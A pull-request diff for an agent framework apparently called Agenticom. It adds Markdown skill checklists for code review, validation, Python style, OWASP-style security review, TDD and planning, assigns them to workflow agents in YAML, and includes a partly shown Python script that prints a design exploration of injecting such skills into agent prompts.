### PR TITLE
feat: Phase 1 — static skill injection for agent personas

### DIFF
--- a/agenticom/bundled_skills/code-review-checklist/SKILL.md
+++ b/agenticom/bundled_skills/code-review-checklist/SKILL.md
@@ -1,0 +1,59 @@
+---
+name: code-review-checklist
+description: Production-readiness code review checklist. Use when reviewing code for quality, security, maintainability, and deployment safety. Covers correctness, error handling, security patterns, and observability.
+license: Apache-2.0
+metadata:
+  author: agenticom
+  version: "1.0"
+---
+
+# Code Review Checklist
+
+## When to Use
+Use when performing a final code review before production approval.
+
+## Do Not Use When
+Reviewing documentation, plans, or non-code artifacts.
+
+## Step-by-Step
+
+1. **Correctness**
+   - Does the code handle the happy path correctly?
+   - Are edge cases handled (null inputs, empty lists, zero values)?
+   - Are boundary conditions correct (off-by-one, inclusive/exclusive ranges)?
+
+2. **Error handling**
+   - Are exceptions caught at the right level?
+   - Do error messages give enough context to debug?
+   - Are resources properly cleaned up (files, connections, locks)?
+
+3. **Security** (flag any of these as CRITICAL):
+   - No hardcoded secrets, tokens, or passwords
+   - User inputs are validated and sanitized before use
+   - SQL/shell/template injection risks are mitigated
+   - Authentication checks are present where required
+   - Sensitive data is not logged
+
+4. **Performance**
+   - No N+1 query patterns (DB calls inside loops)
+   - No unbounded loops or recursion without termination guarantee
+   - Large payloads are streamed, not buffered entirely in memory
+
+5. **Observability**
+   - Meaningful log messages at key decision points
+   - Errors logged with context (not silently swallowed)
+   - Metrics emitted for latency-sensitive paths
+
+6. **Deployment safety**
+   - Database migrations are backward-compatible
+   - No breaking API changes without versioning
+   - Feature flags used for risky rollouts
+
+## Output Format
+```
+CRITICAL issues (block deployment): ...
+WARNINGS (should fix): ...
+SUGGESTIONS (consider): ...
+
+VERDICT: APPROVED FOR PRODUCTION | MAJOR REWORK REQUIRED
+```

--- a/agenticom/bundled_skills/lint-and-validate/SKILL.md
+++ b/agenticom/bundled_skills/lint-and-validate/SKILL.md
@@ -1,0 +1,45 @@
+---
+name: lint-and-validate
+description: Systematic output validation checklist. Use when verifying or reviewing any agent output against acceptance criteria. Ensures specificity, measurability, and completeness of verification reports.
+license: Apache-2.0
+metadata:
+  author: agenticom
+  version: "1.0"
+---
+
+# Lint and Validate
+
+## When to Use
+Use this skill when cross-checking any implementation, plan, or document against stated acceptance criteria.
+
+## Do Not Use When
+Output is purely creative (no measurable criteria exist).
+
+## Step-by-Step
+
+1. **Map criteria to evidence**: For each acceptance criterion, identify the specific line of output that satisfies it. Quote it explicitly — do not paraphrase.
+
+2. **Score each criterion**:
+   - PASS: Criterion is fully met with concrete evidence
+   - PARTIAL: Criterion is addressed but incompletely (explain gap)
+   - FAIL: Criterion is missing or contradicted (explain why)
+
+3. **Check specificity**: Reject vague conclusions like "looks good" or "seems correct". Every verdict must cite specific output lines.
+
+4. **Check measurability**: Quantitative criteria (response time < 200ms, test coverage > 80%) must have numbers in the output, not just assertions.
+
+5. **Check completeness**: Are ALL criteria covered? Unaddressed criteria are implicit FAILs.
+
+6. **Produce a structured verdict**:
+   ```
+   CRITERION 1 — [name]: PASS | PARTIAL | FAIL
+   Evidence: "[exact quote from output]"
+   Gap (if any): ...
+
+   OVERALL: VERIFIED | ISSUES FOUND
+   ```
+
+## Best Practices
+- Be the critic, not the cheerleader. Your job is to find gaps, not to approve work.
+- If the output contains "TODO", "placeholder", or "stub" — flag as PARTIAL at best.
+- A single FAIL criterion means the overall verdict is ISSUES FOUND, not VERIFIED.

--- a/agenticom/bundled_skills/python-coding-standards/SKILL.md
+++ b/agenticom/bundled_skills/python-coding-standards/SKILL.md
@@ -1,0 +1,64 @@
+---
+name: python-coding-standards
+description: Python coding standards and best practices. Use when implementing Python code covering async/await patterns, type hints, error handling, and idiomatic Python conventions.
+license: Apache-2.0
+metadata:
+  author: agenticom
+  version: "1.0"
+---
+
+# Python Coding Standards
+
+## When to Use
+Use when writing any Python code, especially async Python (asyncio, FastAPI, SQLAlchemy async).
+
+## Do Not Use When
+Writing non-Python code.
+
+## Step-by-Step
+
+1. **Type hints on all public functions**:
+   ```python
+   async def get_user(user_id: str) -> User | None:
+   ```
+   - Use `X | None` not `Optional[X]` (Python 3.10+)
+   - Use `list[str]` not `List[str]` (Python 3.9+)
+
+2. **Async patterns**:
+   - Prefer `async def` for I/O bound functions
+   - Never use `time.sleep()` in async code — use `await asyncio.sleep()`
+   - Avoid blocking calls inside async functions (use `asyncio.run_in_executor` for CPU-bound)
+   - Use `asyncio.gather()` for concurrent independent tasks
+
+3. **Error handling**:
+   - Catch specific exceptions, not bare `except:`
+   - Include context in error messages: `raise ValueError(f"Invalid user_id={user_id!r}")`
+   - Use `finally` for resource cleanup, or prefer context managers
+
+4. **Dataclasses over dicts for structured data**:
+   ```python
+   @dataclass
+   class UserConfig:
+       name: str
+       role: str
+       max_retries: int = 3
+   ```
+
+5. **Pathlib over os.path**:
+   ```python
+   path = Path(__file__).parent / "config.yaml"  # not os.path.join(...)
+   ```
+
+6. **f-strings over .format() or %**:
+   ```python
+   msg = f"User {user.name!r} created at {ts:%Y-%m-%d}"
+   ```
+
+7. **No mutable default arguments**:
+   - Bad:  `def f(items=[]):`
+   - Good: `def f(items: list | None = None): items = items or []`
+
+## Style
+- Black formatter, line length 88
+- Ruff linter (rules E, F, W, I, N, UP, B, C4)
+- No TODO comments in submitted code — complete the implementation

--- a/agenticom/bundled_skills/security-code-review/SKILL.md
+++ b/agenticom/bundled_skills/security-code-review/SKILL.md
@@ -1,0 +1,54 @@
+---
+name: security-code-review
+description: Security-focused code review using OWASP Top 10 patterns. Use when verifying or reviewing code for injection, authentication, authorization, data exposure, and other security vulnerabilities.
+license: Apache-2.0
+metadata:
+  author: agenticom
+  version: "1.0"
+---
+
+# Security Code Review
+
+## When to Use
+Use when reviewing code that handles user input, authentication, authorization, or sensitive data.
+
+## Do Not Use When
+Reviewing pure data transformation logic with no external inputs or user-controlled values.
+
+## Step-by-Step
+
+Check each OWASP Top 10 category relevant to the code:
+
+1. **Injection (SQL, shell, template)**
+   - Is user input used directly in SQL queries? → require parameterized queries
+   - Is user input passed to shell commands? → require allowlist validation
+   - Is user input rendered in templates? → require escaping
+
+2. **Broken Authentication**
+   - Are passwords hashed with bcrypt/argon2 (not md5/sha1)?
+   - Are JWTs validated for signature, expiry, and algorithm (`alg != 'none'`)?
+   - Is token rotation enforced on privilege escalation?
+
+3. **Sensitive Data Exposure**
+   - Is PII or credentials logged?
+   - Are secrets hardcoded (scan for `password =`, `api_key =`, `secret =`)?
+   - Is sensitive data returned in API responses unnecessarily?
+
+4. **Broken Access Control**
+   - Does every API endpoint verify the caller has permission for the resource?
+   - Are there IDOR risks (can user A access user B's data by changing an ID)?
+
+5. **Security Misconfiguration**
+   - Are CORS origins restricted (not `*` in production)?
+   - Are error responses generic (not stack traces) for unauthenticated callers?
+
+6. **Rate Limiting**
+   - Are login, registration, and password-reset endpoints rate-limited?
+
+## Output Format
+For each finding:
+```
+[CRITICAL|HIGH|MEDIUM|LOW] — Category — Location
+Issue: [describe the vulnerability]
+Fix: [concrete remediation]
+```

--- a/agenticom/bundled_skills/tdd-patterns/SKILL.md
+++ b/agenticom/bundled_skills/tdd-patterns/SKILL.md
@@ -1,0 +1,50 @@
+---
+name: tdd-patterns
+description: Test-driven development patterns for comprehensive test suites. Use when creating unit tests, integration tests, or test plans. Covers test structure, edge cases, mocking, and coverage strategies.
+license: Apache-2.0
+metadata:
+  author: agenticom
+  version: "1.0"
+---
+
+# TDD Patterns
+
+## When to Use
+Use when writing any test suite — unit, integration, or end-to-end.
+
+## Do Not Use When
+Writing exploratory scripts or one-off debugging code.
+
+## Step-by-Step
+
+1. **Arrange-Act-Assert structure**: Every test must have three clear sections:
+   - Arrange: set up inputs, mocks, and preconditions
+   - Act: call the function/method under test (one action per test)
+   - Assert: verify the output and side effects
+
+2. **Name tests descriptively**:
+   - Pattern: `test_<function>_<scenario>_<expected_outcome>`
+   - Example: `test_create_user_with_duplicate_email_raises_value_error`
+
+3. **Cover these scenario categories for every function**:
+   - Happy path (valid inputs, expected output)
+   - Empty/null/zero inputs
+   - Boundary values (min, max, one over/under)
+   - Invalid types or formats
+   - Error conditions (what should raise?)
+
+4. **Mock external dependencies**: Never hit real databases, APIs, or file systems in unit tests. Use `unittest.mock.patch` or `pytest-mock`.
+
+5. **Assert specifics, not truthiness**:
+   - Bad:  `assert result`
+   - Good: `assert result.status_code == 200`
+   - Good: `assert "error" not in result.json()`
+
+6. **One logical assertion per test**: Multiple assertions hide which one failed.
+
+7. **Test the contract, not the implementation**: Tests should not know about internal variable names or private methods.
+
+## Coverage Targets
+- New functions: 100% line coverage
+- Integration paths: at least one test per code path through the API layer
+- Error handlers: test that errors are raised, not just that the code runs

--- a/agenticom/bundled_skills/technical-planning/SKILL.md
+++ b/agenticom/bundled_skills/technical-planning/SKILL.md
@@ -1,0 +1,57 @@
+---
+name: technical-planning
+description: Structured technical task breakdown and planning. Use when decomposing feature requests into implementable tasks with acceptance criteria, dependency ordering, and risk assessment.
+license: Apache-2.0
+metadata:
+  author: agenticom
+  version: "1.0"
+---
+
+# Technical Planning
+
+## When to Use
+Use when breaking down a feature request or user story into implementable tasks.
+
+## Do Not Use When
+The request is already broken down into specific implementation tasks.
+
+## Step-by-Step
+
+1. **Restate the goal**: In one sentence, what problem does this feature solve for the user?
+
+2. **Identify the system boundary**: What components does this touch?
+   - Data layer (schema changes, new tables/fields)
+   - Business logic layer (new services, modified functions)
+   - API layer (new endpoints, changed contracts)
+   - UI layer (new screens, changed flows)
+
+3. **Break into atomic tasks** using INVEST criteria:
+   - Independent: each task can be implemented and tested on its own
+   - Negotiable: scope can be adjusted without breaking other tasks
+   - Valuable: delivers something observable
+   - Estimable: concrete enough to scope
+   - Small: completable in one development session
+   - Testable: has clear acceptance criteria
+
+4. **For each task, define**:
+   - What to implement (concrete, not vague)
+   - Acceptance criteria (measurable, binary pass/fail)
+   - Dependencies (must be done before this task)
+
+5. **Risk assessment** (for each task, note if it):
+   - Touches shared infrastructure (database schema, auth middleware)
+   - Requires new external dependencies
+   - Has performance implications at scale
+   - Changes existing API contracts
+
+6. **Output format**:
+   ```
+   ## Goal: [one sentence]
+   ## Tasks:
+   1. [Task name]
+      - What: [concrete description]
+      - Accepts: [measurable criteria]
+      - Depends on: [task numbers or "none"]
+      - Risk: [low/medium/high + reason]
+   ## Dependencies diagram: [optional]
+   ```

--- a/agenticom/bundled_workflows/feature-dev-with-diagnostics.yaml
+++ b/agenticom/bundled_workflows/feature-dev-with-diagnostics.yaml
@@ -48,6 +48,8 @@ agents:
   - id: criteria_builder
     name: Criteria Builder
     role: Success Criteria Definition
+    skills:
+      - lint-and-validate
     prompt: |
       You are a requirements analyst specializing in defining measurable success criteria.
 
@@ -71,6 +73,8 @@ agents:
   - id: planner
     name: Planner
     role: Requirements Analysis & Task Breakdown
+    skills:
+      - technical-planning
     prompt: |
       You are a senior technical planner.
 
@@ -91,6 +95,8 @@ agents:
   - id: developer
     name: Developer
     role: Implementation & Code Writing
+    skills:
+      - python-coding-standards
     prompt: |
       You are a senior developer.
 
@@ -109,6 +115,9 @@ agents:
   - id: verifier
     name: Verifier
     role: Cross-Verification Against Spec
+    skills:
+      - lint-and-validate
+      - security-code-review
     prompt: |
       You are a verification specialist.
 
@@ -132,6 +141,8 @@ agents:
   - id: tester
     name: Tester
     role: Test Creation & Execution
+    skills:
+      - tdd-patterns
     prompt: |
       You are a QA engineer.
 
@@ -146,6 +157,8 @@ agents:
   - id: reviewer
     name: Reviewer
     role: Code Review & Quality Assurance
+    skills:
+      - code-review-checklist
     prompt: |
       You are a senior code reviewer.
 

--- a/agenticom/bundled_workflows/feature-dev.yaml
+++ b/agenticom/bundled_workflows/feature-dev.yaml
@@ -17,6 +17,8 @@ agents:
   - id: planner
     name: Planner
     role: Requirements Analysis & Task Breakdown
+    skills:
+      - technical-planning
     prompt: |
       You are a senior technical planner.
 
@@ -37,6 +39,8 @@ agents:
   - id: developer
     name: Developer
     role: Implementation & Code Writing
+    skills:
+      - python-coding-standards
     prompt: |
       You are a senior developer.
 
@@ -52,6 +56,9 @@ agents:
   - id: verifier
     name: Verifier
     role: Cross-Verification Against Spec
+    skills:
+      - lint-and-validate
+      - security-code-review
     prompt: |
       You are a verification specialist.
 
@@ -70,6 +77,8 @@ agents:
   - id: tester
     name: Tester
     role: Test Creation & Execution
+    skills:
+      - tdd-patterns
     prompt: |
       You are a QA engineer.
 
@@ -84,6 +93,8 @@ agents:
   - id: reviewer
     name: Reviewer
     role: Code Review & Quality Assurance
+    skills:
+      - code-review-checklist
     prompt: |
       You are a senior code reviewer.
 

--- a/examples/exploration_01_agent_skills.py
+++ b/examples/exploration_01_agent_skills.py
@@ -1,0 +1,1136 @@
+#!/usr/bin/env python3
+"""
+Exploration 01: Equipping Agents with Skills
+=============================================
+Reference: https://github.com/sickn33/antigravity-awesome-skills (868+ skills)
+Workflow:   feature-dev-with-diagnostics (and all bundled workflows)
+
+This script is a design-space exploration — no LLM key required.
+It answers four questions critically:
+
+  PART A — What are skills?
+            Anatomy of a SKILL.md, categories, invocation syntax.
+            What they CAN and CANNOT give an agent.
+
+  PART B — Current state: where agents are blind without skills.
+            Gap analysis of all 5 base agent personas.
+
+  PART C — Pros & cons of equipping agents with skills.
+            Honest cost/benefit with numbers.
+
+  PART D — When should an agent use a skill?
+            Decision matrix: always-on vs conditional vs never.
+
+  PART E — How is a skill selected?
+            Three selection mechanisms ranked by sophistication.
+
+  PART F — How is a skill activated?
+            Three activation paths: static YAML, task-time injection,
+            self-improvement loop as skill router (the powerful one).
+
+  PART G — Skill-to-agent mapping for all bundled workflows.
+            Concrete recommendations per workflow × agent.
+
+  PART H — Implementation sketch.
+            Minimum viable YAML changes + code touch points.
+
+Run:
+    python examples/exploration_01_agent_skills.py
+"""
+
+from __future__ import annotations
+
+import sys
+from pathlib import Path
+
+ROOT = Path(__file__).resolve().parent.parent
+sys.path.insert(0, str(ROOT))
+
+WIDTH = 72
+
+
+def rule(char: str = "─", w: int = WIDTH) -> None:
+    print(char * w)
+
+
+def banner(title: str) -> None:
+    print()
+    rule("═")
+    print(f"  {title}")
+    rule("═")
+
+
+def section(title: str) -> None:
+    print()
+    rule("─")
+    print(f"  {title}")
+    rule("─")
+
+
+def sub(title: str) -> None:
+    print(f"\n  ▸ {title}")
+
+
+def tick(label: str, note: str = "", good: bool = True) -> None:
+    icon = "✓" if good else "✗"
+    note_str = f"  — {note}" if note else ""
+    print(f"      {icon}  {label}{note_str}")
+
+
+# ─────────────────────────────────────────────────────────────────────────────
+# PART A — What are skills?
+# ─────────────────────────────────────────────────────────────────────────────
+
+
+def part_a_skill_anatomy() -> None:
+    banner("PART A  —  What are skills? (antigravity-awesome-skills anatomy)")
+
+    print("""
+  Repository : https://github.com/sickn33/antigravity-awesome-skills
+  Skills     : 868+ community-maintained skill documents
+  Format     : Each skill is a directory skills/<name>/SKILL.md
+  Install    : npx antigravity-awesome-skills --claude  (→ .claude/skills/)
+  Invoke     : /skill-name in Claude Code, @skill-name in Cursor
+
+  A skill is a MARKDOWN DOCUMENT, not executable code.
+  It injects domain-specific instructions into the agent's system prompt.
+""")
+
+    section("SKILL.md anatomy — what every skill contains")
+    print("""
+  ┌─ Frontmatter (required) ─────────────────────────────────────────────┐
+  │  ---                                                                 │
+  │  name: your-skill-name            # kebab-case, matches folder name  │
+  │  description: "One sentence"      # shown in skill listings          │
+  │  metadata:                                                           │
+  │    model: inherit                 # which LLM to use (usually inherit)│
+  │  ---                                                                 │
+  └──────────────────────────────────────────────────────────────────────┘
+
+  ┌─ Body sections (convention) ─────────────────────────────────────────┐
+  │  # Skill Name                                                        │
+  │  ## Overview          — what this skill specializes in               │
+  │  ## When to Use       — trigger conditions (explicit)                │
+  │  ## Do Not Use When   — anti-patterns (explicit)                     │
+  │  ## Step-by-Step      — concrete instructions the agent follows      │
+  │  ## Examples          — at least one copy-paste ready example        │
+  │  ## Safety            — risk labels, constraints                     │
+  │  ## Best Practices    — domain-specific heuristics                   │
+  └──────────────────────────────────────────────────────────────────────┘
+
+  Example from skills/ai-engineer/SKILL.md (8,925 bytes):
+    "You are an AI engineer specializing in production-grade LLM applications.
+     Use this skill when: Building RAG systems, LLM features, AI agents.
+     Do not use when: Pure data science without LLMs.
+     Instructions: 1. Clarify constraints. 2. Design architecture. ..."
+""")
+
+    section("Skill categories and count")
+    CATEGORIES = [
+        ("Architecture",  68,  "System design, C4 diagrams, DDD, event sourcing, microservices"),
+        ("Business",      38,  "SEO, pricing, financial modeling, competitive analysis"),
+        ("Data-AI",      159,  "LLM apps, RAG, vector DBs, Azure AI (100+ azure-* skills), prompt eng"),
+        ("Development",  132,  "Python, TypeScript, Go, React, Next.js, databases, API design"),
+        ("General",       15,  "Planning, documentation, brainstorming, lint-and-validate"),
+        ("Infrastructure", 80, "DevOps, CI/CD, Docker, Kubernetes, cloud deployment"),
+        ("Security",      60,  "AppSec, pentest, compliance, AWS/AD attacks, API fuzzing"),
+        ("Testing",       40,  "TDD, QA, test design, browser automation patterns"),
+        ("Other",        276,  "3D-web, airtable, algolia, analytics, CRM, agent frameworks..."),
+    ]
+    print(f"\n  {'Category':<18} {'Count':>7}  Skills include")
+    print(f"  {'─' * 70}")
+    total = 0
+    for cat, count, desc in CATEGORIES:
+        print(f"  {cat:<18} {count:>7}  {desc}")
+        total += count
+    print(f"  {'─' * 70}")
+    print(f"  {'TOTAL':<18} {total:>7}")
+
+    section("What skills CAN and CANNOT give an agent")
+    print("""
+  ┌─ CAN give ───────────────────────────────────────────────────────────┐
+  │                                                                      │
+  │  • Domain knowledge injection — patterns, best practices, frameworks │
+  │    that the base model knows but wouldn't apply without prompting    │
+  │                                                                      │
+  │  • Explicit behavioural constraints — "always validate input",       │
+  │    "never send PII to external models", security guardrails          │
+  │                                                                      │
+  │  • Step-by-step reasoning scaffolds — reduce hallucination by        │
+  │    giving the agent a decision tree to follow                        │
+  │                                                                      │
+  │  • Output format specifications — schema, checklist, template        │
+  │    that downstream agents can parse reliably                         │
+  │                                                                      │
+  │  • "When not to use" guards — prevents scope creep into              │
+  │    areas the agent should leave to a different specialist            │
+  │                                                                      │
+  └──────────────────────────────────────────────────────────────────────┘
+
+  ┌─ CANNOT give ────────────────────────────────────────────────────────┐
+  │                                                                      │
+  │  • Real-world tool access — a skill is instructions, NOT an API      │
+  │    call. "web-search" skill tells the agent HOW to think about       │
+  │    searching; it cannot actually execute an HTTP request.            │
+  │                                                                      │
+  │  • Fresh data — skills are static markdown; they cannot pull         │
+  │    live prices, current docs, or real-time search results.           │
+  │                                                                      │
+  │  • Verification of facts — no external lookup = no ground truth.    │
+  │    Skills improve reasoning quality, not factual accuracy.           │
+  │                                                                      │
+  │  • Autonomy over tool selection — in Agenticom's pipeline, the       │
+  │    skill document is merged into the system prompt; the agent        │
+  │    still cannot decide mid-step to call a new tool unless the        │
+  │    tool is explicitly wired via MCP.                                 │
+  │                                                                      │
+  └──────────────────────────────────────────────────────────────────────┘
+""")
+
+
+# ─────────────────────────────────────────────────────────────────────────────
+# PART B — Current state: where agents are blind
+# ─────────────────────────────────────────────────────────────────────────────
+
+
+def part_b_current_gaps() -> None:
+    banner("PART B  —  Current state: where base agent personas fall short")
+
+    section("How agents work today (no skills)")
+    print("""
+  Every agent has three layers of text that form its effective system prompt:
+
+  Layer 1: persona          (from YAML prompt: field, or specialized.py default)
+  Layer 2: system_prompt    (LLMAgent builds: persona + role label + context)
+  Layer 3: task input       (WorkflowStep.input_template, substituted at runtime)
+
+  Execution path:
+    AgentTeam._execute_step()
+      → template substitution ({{task}}, {{step_outputs.X}})
+      → agent.execute(input_data, AgentContext)
+        → LLMAgent._execute_task()
+          → full_prompt = system_prompt + "\\nTask: " + input_data
+          → executor(full_prompt, context)   ← one LLM call
+          → return raw text output
+
+  No skill routing. No tool dispatch. No mid-step capability extension.
+  The agent produces output purely from its persona + the task text.
+""")
+
+    section("Gap analysis: what each base agent is missing")
+
+    AGENT_GAPS = [
+        (
+            "criteria_builder",
+            "Requirements analyst defining measurable success criteria",
+            [
+                ("Domain-specific testability patterns",
+                 "Knows 'make criteria testable' but not HOW for React, APIs, auth flows separately"),
+                ("Accessibility criterion templates",
+                 "No WCAG 2.1 / ARIA patterns — a11y criteria are consistently missing"),
+                ("Performance budget templates",
+                 "No LCP/FID/CLS thresholds, response-time SLOs — only generic 'fast'"),
+                ("Security criterion templates",
+                 "No OWASP-aligned criteria — rate-limit, injection, token expiry patterns absent"),
+            ],
+        ),
+        (
+            "planner",
+            "Senior technical planner breaking features into tasks",
+            [
+                ("Story decomposition patterns",
+                 "Breaks down tasks but doesn't apply INVEST (Independent/Negotiable/Valuable...) rules"),
+                ("Risk taxonomy",
+                 "Lists 'Risks:' but no structured risk matrix — no likelihood × impact scoring"),
+                ("Dependency graph awareness",
+                 "Identifies dependencies by name but not critical-path ordering or parallelism"),
+                ("Architecture decision records",
+                 "No ADR template — technical decisions are buried in prose, not version-controlled"),
+            ],
+        ),
+        (
+            "developer",
+            "Senior developer implementing code",
+            [
+                ("Language-specific idioms",
+                 "Generic coding standards — no Python async patterns, TS strict types, Go conventions"),
+                ("Security implementation patterns",
+                 "No input sanitisation, parameterised queries, JWT validation patterns by default"),
+                ("Framework-specific patterns",
+                 "No React hooks rules, Next.js app-router conventions, FastAPI dependency injection"),
+                ("Browser/runtime target awareness",
+                 "Writes code but doesn't consider CSP headers, CORS preflight, SSR hydration gaps"),
+            ],
+        ),
+        (
+            "verifier",
+            "Verification specialist cross-checking against spec",
+            [
+                ("Security verification checklist",
+                 "Checks 'acceptance criteria' but no OWASP Top 10 review by default"),
+                ("Performance verification",
+                 "No Lighthouse score check, no bundle-size review, no DB query explain plan"),
+                ("Accessibility verification",
+                 "No screen-reader check, no keyboard navigation test, no colour-contrast review"),
+                ("API contract verification",
+                 "No schema validation, no status-code coverage check, no error-response format"),
+            ],
+        ),
+        (
+            "tester",
+            "QA engineer creating test suites",
+            [
+                ("Property-based testing patterns",
+                 "Writes example-based tests only — no Hypothesis/fast-check fuzz strategies"),
+                ("Mutation testing awareness",
+                 "No guidance to check test resilience — 100% line coverage ≠ good tests"),
+                ("Contract testing patterns",
+                 "No Pact / OpenAPI validation — API changes break consumers silently"),
+                ("Performance test scaffolds",
+                 "No k6/Locust load test — only unit/integration, missing SLO validation"),
+            ],
+        ),
+        (
+            "reviewer",
+            "Senior code reviewer assessing production readiness",
+            [
+                ("Security review checklist",
+                 "No SAST-style review — hardcoded secrets, SQL injection, XSS often missed"),
+                ("Observability review",
+                 "No check for structured logs, metrics, tracing — dark production code"),
+                ("Cost / resource review",
+                 "No review of N+1 queries, unbounded loops, memory allocation patterns"),
+                ("Deployment safety review",
+                 "No migration safety check, no feature-flag requirement, no rollback plan"),
+            ],
+        ),
+    ]
+
+    for agent_id, role, gaps in AGENT_GAPS:
+        print(f"\n  ┌─ {agent_id.upper()} ({role}) {'─' * max(0, WIDTH - len(agent_id) - len(role) - 6)}┐")
+        for gap_name, detail in gaps:
+            print(f"  │  ✗  {gap_name}")
+            print(f"  │       {detail}")
+        print("  └" + "─" * 70 + "┘")
+
+
+# ─────────────────────────────────────────────────────────────────────────────
+# PART C — Pros and cons
+# ─────────────────────────────────────────────────────────────────────────────
+
+
+def part_c_pros_cons() -> None:
+    banner("PART C  —  Honest pros & cons of equipping agents with skills")
+
+    section("PROS")
+    print("""
+  1. Community-validated domain knowledge (868 skills, maintained externally)
+     ─────────────────────────────────────────────────────────────────────
+     Skills in the repo are battle-tested by real engineers across thousands
+     of projects. The `typescript-react-patterns` skill encodes patterns that
+     would take a prompt engineer hours to distill. Adding it to the developer
+     agent is free domain knowledge.
+
+  2. Composability — mix and match per workflow
+     ─────────────────────────────────────────────────────────────────────
+     Skills compose without conflict. The developer agent on `due-diligence`
+     can use `startup-financial-modeling` while the same developer on
+     `security-assessment` uses `api-fuzzing-bug-bounty`. No code changes —
+     just YAML configuration.
+
+  3. Reduces persona drift and specificity gaps
+     ─────────────────────────────────────────────────────────────────────
+     The SMARC self-improvement loop flags "output_specificity = 0.1 (LOW)"
+     for the verifier. Instead of waiting 5 runs and applying a heuristic
+     suffix, you could inject `owasp-top10` skill at startup and get
+     specificity immediately.
+
+  4. Directly improves SMARC scores without LLM evolution calls
+     ─────────────────────────────────────────────────────────────────────
+     Skills address the root cause (missing domain knowledge) rather than
+     the symptom (low SMARC score). A patch that appends
+     "CRITICAL: Be specific" is weaker than a skill that says
+     "For auth endpoints, always check: JWT alg != 'none', exp claim,
+      token rotation on privilege escalation, timing-safe comparison."
+
+  5. Skill library is version-controlled and updateable independently
+     ─────────────────────────────────────────────────────────────────────
+     `git -C .agent/skills pull` upgrades all skills without touching
+     workflow YAMLs. When the community updates `nextjs-app-router-patterns`
+     for Next.js 15, the developer agent automatically benefits.
+
+  6. Synergy with the self-improvement loop (covered in Part F)
+     ─────────────────────────────────────────────────────────────────────
+     The PromptEvolver can use skill CONTENT as patch material.
+     Instead of heuristic suffixes, it injects the relevant skill sections
+     that specifically address detected gaps — LLM-quality patches without
+     needing an LLM call.
+""")
+
+    section("CONS")
+    print("""
+  1. Token cost: skills are large — injecting naively is expensive
+     ─────────────────────────────────────────────────────────────────────
+     The `ai-engineer` skill is 8,925 bytes ≈ 2,200 tokens.
+     With 6 agents each receiving 2 skills, that is ~26,400 extra tokens
+     per run. At $3/M tokens (claude-sonnet-4-6) that is $0.08 per run.
+     Over 1,000 runs = $80 of pure skill-injection overhead.
+
+     Mitigation: inject SUMMARIES (first 300 tokens of skill) or only
+     the "Step-by-Step" section, not the full document.
+
+  2. Skills assume human-in-the-loop; Agenticom is autonomous
+     ─────────────────────────────────────────────────────────────────────
+     Many skills instruct: "Ask the user to clarify...", "Confirm with
+     the client before proceeding...", "Request approval for..."
+     In Agenticom's pipeline there is no user mid-step. Such instructions
+     cause the agent to either hallucinate a user response or stall.
+
+     Mitigation: preprocess skill content — strip "ask the user" clauses
+     or replace with "document the assumption in your output."
+
+  3. Skills overlap and may conflict with existing personas
+     ─────────────────────────────────────────────────────────────────────
+     The developer agent's YAML persona already says "no TODO comments".
+     A skill might say "add TODO markers for optional enhancements."
+     Contradictory instructions cause inconsistent agent behaviour.
+
+     Mitigation: skill injection is ADDITIVE at the end; conflicts should
+     be resolved by an explicit "Skill overrides persona on X" header.
+
+  4. Skills are static; self-improvement is dynamic
+     ─────────────────────────────────────────────────────────────────────
+     The improvement loop evolves personas based on actual run data.
+     A statically injected skill knows nothing about this specific workflow's
+     failure patterns. It may inject irrelevant content (e.g., a skill about
+     GraphQL when the workflow builds a REST API).
+
+     Mitigation: only activate skills when the SMARC gap specifically maps
+     to the skill's domain (Part E, Approach 3).
+
+  5. Skill quality is uneven across the 868 collection
+     ─────────────────────────────────────────────────────────────────────
+     Some skills are comprehensive and precise; others are thin stubs.
+     The security category has both deep skills (api-fuzzing-bug-bounty)
+     and shallow ones. There is no quality signal beyond the V4 checklist.
+
+     Mitigation: curate an internal registry of approved skills per
+     workflow type, rather than allowing arbitrary skill assignment.
+
+  6. No feedback mechanism from skills back to the improvement loop
+     ─────────────────────────────────────────────────────────────────────
+     When a skill improves an agent's output, the improvement loop doesn't
+     know it was the skill that helped. This breaks attribution — the loop
+     might propose patches that undo what the skill already fixed.
+
+     Mitigation: record `active_skills` in RunRecord metadata so the loop
+     can correlate SMARC improvements with skill presence.
+""")
+
+
+# ─────────────────────────────────────────────────────────────────────────────
+# PART D — Decision matrix: when should an agent use a skill?
+# ─────────────────────────────────────────────────────────────────────────────
+
+
+def part_d_decision_matrix() -> None:
+    banner("PART D  —  When should an agent use a skill? Decision matrix")
+
+    section("Three-tier decision framework")
+    print("""
+  TIER 1: ALWAYS-ON  (inject at startup, every run)
+  ─────────────────────────────────────────────────
+  Use when:
+    • The skill domain matches the agent's primary role exactly
+    • The workflow type always requires the domain knowledge
+    • Skill content is focused and short (< 500 tokens)
+    • The skill has "Do Not Use When" guard-rails that prevent scope creep
+
+  Examples:
+    planner          ← brainstorming, lint-and-validate (always useful)
+    security-assess  ← owasp-top10 for verifier (always applies)
+    due-diligence    ← startup-financial-modeling for analyst (always applies)
+
+  TIER 2: CONDITIONAL  (inject based on task content analysis)
+  ──────────────────────────────────────────────────────────────
+  Use when:
+    • The skill domain may or may not apply depending on the task
+    • Injecting always would waste tokens on irrelevant content
+    • A simple keyword/pattern check on the task description is sufficient
+
+  Decision rule: task_text.lower() contains any of skill.keywords?
+    → inject    → skip
+
+  Examples:
+    developer   ← typescript-react-patterns  (only if task mentions React/TS)
+    developer   ← postgres-best-practices    (only if task mentions DB/SQL)
+    developer   ← async-python-patterns      (only if task is Python async)
+    tester      ← agent-evaluation           (only if testing an AI component)
+
+  TIER 3: NEVER  (do not inject — negative ROI)
+  ──────────────────────────────────────────────
+  Avoid when:
+    • Skill body length > 3,000 tokens (kills context budget)
+    • Skill assumes human interaction ("ask the user to...") throughout
+    • Skill domain is orthogonal to the agent's step in this workflow
+    • Skill content is already covered verbatim by the base persona
+    • Skill is in Security category with offensive technique instructions
+      (risk of generating harmful content in autonomous mode)
+
+  Examples:
+    active-directory-attacks  ← never for any Agenticom workflow
+    anti-reversing-techniques ← never in autonomous mode
+    social-media-* skills     ← never for developer/tester agents
+""")
+
+    section("Signal-based activation triggers")
+    print("""
+  Beyond keyword matching, four signals can trigger skill activation:
+
+  Signal 1: SMARC gap score  (from self-improvement loop)
+  ────────────────────────────────────────────────────────
+  if agent_smarc["specific"] < 0.4 for N consecutive runs:
+      check skill registry for skills that improve specificity
+      in the agent's domain → conditional inject
+
+  Signal 2: Retry count  (from WorkflowStep execution)
+  ────────────────────────────────────────────────────────
